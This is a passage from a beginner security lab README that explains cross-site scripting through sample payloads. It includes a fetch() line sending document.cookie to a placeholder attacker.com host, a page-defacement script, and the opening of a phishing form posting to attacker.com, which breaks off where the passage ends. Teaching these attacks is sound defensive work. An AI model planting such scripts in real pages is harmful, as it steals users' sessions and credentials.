poridhiEng/poridhi-labs/Poridhi Labs/Security Labs/Pre Security Module/Lab 07/README.md

   ```javascript
   fetch('https://attacker.com/steal?cookie=' + document.cookie);
   ```

+  `document.cookie` is used to get the cookies of the user which is stored in the browser.

 - **Manipulating the page (DOM)**:
   ```javascript
   document.body.innerHTML = '<h1>This site has been hacked!</h1>';
   ```
+  `innerHTML` is used to get the innerHTML of the body of the page.
+When the page is loaded, the script is executed and the innerHTML of the body is changed to `<h1>This site has been hacked!</h1>`.

 - **Tricking users with phishing forms**:
   ```html
   <form action="https://attacker.com/login" method="POST">